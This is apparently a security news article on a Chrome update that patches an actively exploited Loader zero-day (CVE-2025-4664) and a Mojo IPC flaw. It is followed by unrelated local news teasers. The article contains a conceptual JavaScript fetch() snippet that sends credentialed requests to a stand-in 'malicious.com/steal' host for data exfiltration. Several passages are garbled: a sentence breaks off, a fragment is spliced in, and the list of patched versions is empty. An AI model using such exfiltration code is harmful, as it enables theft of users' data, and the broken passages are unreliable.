This rollout will reach users over the coming days and weeks and addresses four security vulnerabilities, including a high-severity zero-day actively exploited in the wild.
The most urgent fix targets CVE-2025-4664, a flaw described as “insufficient policy enforcement in Loader.”
Security researchers warn that this vulnerability allows remote attackers to bypass Chrome’s internal security policies via crafted HTML, enabling
The exploit was first disclosed by @slonser_ on May 5, 2025, and Google confirmed active exploitation before the patch release.
Technical analysis indicates attackers could leverage this bug to escape browser sandboxing, a core defense mechanism isolating web content from system resources.
javascript// Example: Exploiting insufficient policy enforcement (conceptual)
fetch('https://malicious.com/steal', {
credentials: 'include'
})
.then(response => response.text())
.then(data => {
// Cross-origin data exfiltration logic
});
Another high-severity bug, CVE-2025-4609, involves the Mojo Inter-Process Communication (IPC) subsystem.
Incorrect handling of the system in unspecified scenarios could enable privilege escalation or memory corruption, particularly on Windows systems.
Such flaws undermine the Chrome sandbox, potentially allowing sandboxed renderer processes to access privileged resources.
Google credits external researchers for identifying these vulnerabilities and highlights its ongoing use of advanced memory analysis tools like AddressSanitizer, MemorySanitizer, and libFuzzer.
AddressSanitizer, for instance, instruments code to detect out-of-bounds memory accesses and use-after-free bugs, providing real-time detection with minimal performance overhead.
Accept-Language header and partitioning :visited Link history to prevent cross-site history leaks.Users are strongly advised to update Chrome immediately by navigating to chrome://settings/help.
The patched versions are:
With active exploitation reported, prompt updating is critical to mitigate risk from these vulnerabilities.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
The post Critical Google Chrome 0-Day Flaw Under Attack – Patch Immediately appeared first on Cyber Security News.
Today, we’re revisiting a classic Monty Python skit. The scene is the 1972 Munich Olympics.…
This weekend in New Jersey, the music runs the gamut from Irish classics to GRAMMY-winning…
Travel + Leisure released its picks for eight must-see boardwalks along New Jersey’s coast. Writers…
Trader Joe’s will open a shop in Jersey City at 55 Hudson St. Doors should…
DraftKings Casino hands new users in New Jersey up to 500 free spins on Cash…
New Jersey legislators are pushing Senate Bill 3401 forward. The measure would stop online casinos…
This website uses cookies.